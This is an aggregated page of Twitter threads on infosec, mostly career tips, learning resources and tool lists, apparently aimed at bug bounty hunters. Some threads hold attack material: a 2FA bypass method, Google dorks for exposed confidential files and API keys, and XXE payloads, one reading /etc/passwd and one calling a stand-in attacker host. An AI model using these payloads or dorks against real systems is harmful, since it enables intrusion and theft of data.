Discover and read the best of Twitter Threads about #infoSec

Most recents (24)

Two factor Authentication bypass : ⚔️

- In applications registration , it required a mobile number for compulsory 2 factor authentication.
- Captured the request for mobile number addition
POST /mobile/add

{XXNUMBERXX}
(1/n)

- Now followed the registration normally by adding a mobile number.
- Now when I login to account it required an otp to proceed.
- Used an invalid otp like 111111 and intercepted the request.
- Changed the request PATH and BODY to earlier captured request.
(2/n)

- They we’re implementing checks for all internal api endpoints before entering otp but forget to add check for mobile number addition request.
- I was able to add a new number without entering otp
- This led to 2fa bypass.

#infosec #cybersec #bugbounty
Read 3 tweets
Google Dorks - Cloud Storage #2:

site:dev.azure.com "example[.]com"
site:onedrive.live.com "example[.]com"
site:digitaloceanspaces.com "example[.]com"

Find sensitive data and company assets

#recon #bugbountytips #infosec #seo
Combine:

site:dev.azure.com | site:onedrive.live.com | site:digitaloceanspaces.com "example[.]com"

Add something to narrow the results: "confidential" "privileged" "apikey"
Read 6 tweets
I have unfollowed most of the people I used to follow in #infosec and pretty much all of the musicians I used to follow, from Hall and Oates to Jamiroquai to Siouxsie and the Banshees.

Every world tour and every maskless convention selfie is a betrayal... #CovidIsNotOver 🧵
I'm finally in a point in my life where I can afford overpriced concert tickets and some travel if it's something that's really a priority to me.

But fuck no. The musicians I genuinely used to love now will never see a dime out of me ever again...
I BitTorrent their music, because even Spotify and YouTube plays would give them a fraction of a cent each time.

My favourite musicians (musically, at least) aren't even starving artists. Have you seen Jay Kay's car collection?!
Read 14 tweets
😱 I asked ChatGPT "What are some of the unpopular SQL injection areas" and this is what it replied.

🧵👇

#bugbounty #cybersecurity #infosec #sqli
1. Error messages: Sometimes error messages can reveal important information about the application's database, such as table names or column names. An attacker can use this information to craft a SQL injection attack.
2. Search fields: Search fields are often overlooked when testing for SQL injection vulnerabilities, but they can be an easy target for attackers. In un-sanitized search queries, an attacker can inject SQL code to retrieve sensitive data from the database.
Read 7 tweets
40 Best PenTesting Toolkits

Information Gathering

•OSINT Framework
•Nmap
•Whois
•Recon-ng
•Wireshark
•Dnsrecon
•Google Hacking Database
•Nikto
•Dnsenum
Scanning and Enumeration

•Nmap
•Nikto
•Powershell Scripts
•Openvas
•Nessus
•Sqlninja
•OWASP ZAP
•Wp-scan
Exploitation

•Metasploit
•Sqlmap
•Mitre Att&ck
•Burp Suite
•Hydra
•Netcat
•Routersploit
•Cain and Abel
•John the Ripper
•Hashcat
Read 7 tweets
Google Dorks - File Storage:

site:dropbox.com/s "example[.]com"
site:box.com/s "example[.]com"
site:docs.google.com inurl:"/d/" "example[.]com"

Find sensitive data and company accounts

#recon #bugbountytips #infosec #seo
Combine:

site:dropbox.com/s | site:box.com/s | site:docs.google.com "example[.]com"

Add something to narrow the results: "confidential" "privileged" "not for public release"
Read 6 tweets
20 FREE Cybersecurity Certifications to Add to Resume/CV
1. Introduction to Cybersecurity

netacad.com/courses/cybers…
2. Computer Forensics

edx.org/course/compute…
Read 23 tweets
From Noob to Pentesting Clients in 2023 👇
1. Be laser focused to become l33t. Cybersecurity is a large field and you can't be an expert of everything.
2. Let's say you choose application security. Here's how I would skill up really fast.
Read 9 tweets
HTTP Parameter Pollution @SecGPT has seen in its training. Image
1. ATO via password reset

The attacker manipulates the HTTP parameters of the password reset page to change the email address associated with the account; then use the password reset link => ATO.
2. Price manipulation in e-commerce platforms

The attacker manipulates the HTTP parameters of an e-commerce website to change the price of a product. The attacker can then purchase the product at a lower price than intended.
Read 5 tweets
𝐌𝐚𝐥𝐰𝐚𝐫𝐞 𝐚𝐧𝐝 𝐑𝐞𝐯𝐞𝐫𝐬𝐞 𝐄𝐧𝐠𝐢𝐧𝐞𝐞𝐫𝐢𝐧𝐠 𝐂𝐨𝐧𝐭𝐞𝐧𝐭𝐬 📢

#infosec #Hacking #redteam
#malware #ReverseEngineering
#RE

Awesome Malware and Reverse Engineering
lnkd.in/dZFy_k6d

lnkd.in/dZh9hbpq
Malware API
malapi.io

lnkd.in/djqeN7RS

Malware Analysis and Reverse Engineering
lnkd.in/dXjFkZ7a

Retoolkit
lnkd.in/dwn8bRi3

Malware Bazar
bazaar.abuse.ch

Malware Analysis Journey
lnkd.in/d9B6UGQ8
Read 6 tweets
🚀🔒Exciting news! SecGPT is now LIVE!

Trained on thousands of cybersecurity reports, SecGPT revolutionizes cybersecurity with AI-driven insights.👇
1. Trained on an extensive collection of cybersecurity reports, @SecGPT provides you with a deeper understanding of vulnerabilities, exploitation techniques, and emerging trends in cybersecurity.

Its knowledge increases as more reports and writeups are published.
2. Explore SecGPT's capabilities and see how it can assist you in enhancing your cybersecurity expertise.

Try it out for free at alterai.me

#ai #cybersecurity #infosec #pentesting #ethicalhacking #bugbounty #bugbountytips #secgpt
Read 7 tweets
CAN I BE HACKED VIA BLUETOOTH?

Yes,

Once a Device is ‘Bluebugged’, the Hacker can access the target device, steal and modify device data, listen to calls, and read messages.

A thread
What is a Bluetooth Attack?

This is a form of Hacking Technique that allows the attacker access to a device with a Bluetooth discoverable connection or when a Bluetooth technology is left on
Types of Bluetooth Attacks

· Bluesnarf Attack
· Man-in-The Middle (MiTM) Attack
· BlueJacking
· BlueSmacking (DoS Attack)
· BluePrinting Attack
· BlueBugging
Read 7 tweets
Boost your pentesting and bug bounty game with SecGPT's AI insights from thousands of online security reports.

I've asked it for some XXE payloads found in the reports. Image
1. Basic XXE payload

`<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>`
2. Blind XXE payload

`<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attackerdomain/xxe.dtd">%xxe;]><foo></foo>`
Read 7 tweets
Unlocking the Secrets: Breaking Access Controls, the basics 👇

(from the AI model I'm currently training on security reports) Image
1. Direct object reference

This occurs when an attacker is able to access a resource directly by manipulating a parameter in the URL or form data.
2. Horizontal privilege escalation

This occurs when an attacker is able to access resources or perform actions that are intended for another user with the same level of access.
Read 8 tweets
Often times to simplify my work I build scripts.👇

I recently discovered katana by @pdiscoveryio. And I turned this:

katana -d 5 -c 50 -p 20 -ef "ttf,woff,svg,jpeg,jpg,png,ico,gif,css" -u <https://tld> -cs "regex-to-restrict-to-tld-and-subdomains"

into this:

kata <tld>
1. The long command does the following:

-d => depth 5
-c => concurrency 50
-p => threads in parallel 20
-ef => exclude these
-u => supply the top level domain (i.e. twitter.com)
-cs => scope for this regex (limited to the tld and its subdomains)
2. You can download the kata bash script from my repo below. Use it as:

kata <tld>

Do me a favor and star the repo, thanks!

#pentesting #infosec #cybersecurity #ethicalhacking #bugbounty #bugbountytips

github.com/CristiVlad25/s…
Read 3 tweets
🚨Security Career Resource Thread 🚨

1️⃣ 2️⃣ resources to break into the field or take your career to the next level 👇

#infosec #cybersecurity #security
Learn:

🎓 How to get into various fields: pentesting, SOC analyst, AppSec, ...

🎫 Certs - do they matter? For which roles?

🧪 Doing security research

📣 Building your brand via blog posts, conference talks, and more

💸 How to think about compensation
📺 Launch your cybersecurity career: @IppSec's advice on how to become a skilled professional

* Technical tips
* Keeping a positive mindset
* Life is what you make it

#bugbounty #bugbountytips

Read 15 tweets
As much as I love automation in recon, 98% of the findings in my pentests have nothing to do with it. Why? 👇
1. Inspired by @NahamSec recent video.

First, in a large majority of the web pentests, clients want me to focus only on their app and it's features. So, there's no need for subdomain enumeration/bruteforcing or any other large recon tactic.
2. This doesn't mean that I don't use automation. I automate some of the boring and repetitive tasks via bash and python.
Read 9 tweets
7 Steps to Take When Pivoting into the Cybersecurity Industry
1. Acquire the fundamental knowledge. This can be achieved via Certifications and Online Courses

2. Improve your Hands-On Skills. Experiment on onsite or offsite environments.
3. Build a great Portfolio. Work on personal and collective projects, improve your writing and documenting skills,Participate in hackathons and CTFs and so on.
Read 6 tweets
🧵Thread: "Discovering the Hidden World with Geomint"

Hey OSINT PUNKs! Are you ready to take your investigative skills to the next level? It's time to discover the hidden world with Geomint! 🌎🕵️‍♂️
#OSINT #infosec #GEOMINT
So what exactly is Geomint? It's the art of using geolocation data to gather intelligence about people, places, and events. With Geomint, you can uncover valuable information that may be hidden in plain sight.
There are many tools available for Geomint, and we've compiled a list of some of the best ones to get you started:
Read 10 tweets
More practice, less theory (but not 0 theory)

In the past, I criticized Top 1% THM who know close to nothing about the real-world aspects of a pentest.

My point was not understood and I got a lot of hate for it. Image
1. Again, there's less value in being Top 1% if your experience is purely theoretical.

Yet, you will go way further if you complement your experience (from day-to-day work in cybersecurity) with continuous practice on THM and other platforms (focusing on non-CTFish materials).
2. If you're not working in cybersecurity yet, but you want to, no problem.

Get your daily real-world experience from VDPs (and not paid bounties).
Read 4 tweets
In 1998, two Stanford students published "The Anatomy of a Large-Scale Hypertextual Web Search Engine," in which they wrote, "Advertising funded search engines will be inherently biased towards the advertisers and away from the needs of consumers."

research.google/pubs/pub334/ 1/ A modified version of Hiero...
If you'd like an essay-formatted version of this thread to read or share, here's a link to it on pluralistic.net, my surveillance-free, ad-free, tracker-free blog:

pluralistic.net/2023/02/24/pas… 2/
The co-authors were Lawrence Page and Sergey Brin, and the "large-scale hypertextual web search-engine" they were describing was their new project, which they called "#Google." They were 100% correct - prescient, even! 3/
Read 62 tweets
🧵
Today marks the first anniversary of the Russia-Ukraine #cyberwar that killed <checks Microsoft's & Mandiant's reports> no one.

Let's go over last year's mass cyberwar #panic. We'll begin with one of the earliest calls to #boycott @Kaspersky:
There was an immediate feeling that everyone must cancel all Kaspersky subscriptions, as if customers -- especially corporate clients -- had a competitor's product waiting in the wings to replace it in some trivial fashion:
Likewise, there was an immediate plea to [translated] "remove Kaspersky from your PC. Now. Immediately." Again, as if customers -- especially corporate clients -- could do it trivially and without serious consequences:
Read 36 tweets
Grow your cybersecurity skills with this incredible collection of FREE learning resources.

⚡️ Get ready to level up!

Follow & share the 🧵

#infosec #cybersecurity #pentesting #bugbounty
#hacking #blueteam #redteam #technology #DataSecurity #CyberSec #Linux#soc #dfir
1️⃣ Hands-on cyber security training through real-world scenarios.

tryhackme.com
2️⃣ LiveOverflow YouTube channel

youtube.com/@LiveOverflow
Read 11 tweets
Learn Cybersecurity for FREE on YouTube.

Here are 12 pages to check out
1 Network Chuck- Everything Cybersecurity related

2 Outpost Gray- Cybersecurity Carer Dev

3 The XSS Rat- Bounty Hunting

4 Cyrill Gossi- Cryptography Videos

5 Cyberspatial- Cybersecurity Education and Training

6 Bugcrowd- Bug Bounty Interviews and Methodology
7 Professor Messer- Guides covering Certifications

8 Black Hat- Cybersecurity Technical Conferences

9 Hak5- Everything Cybersecurity

10 Infosec Institute- Cybersecurity Awareness

11 HackerSploit- Pen Test and Web App Hacking
Read 4 tweets

Related hashtags

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!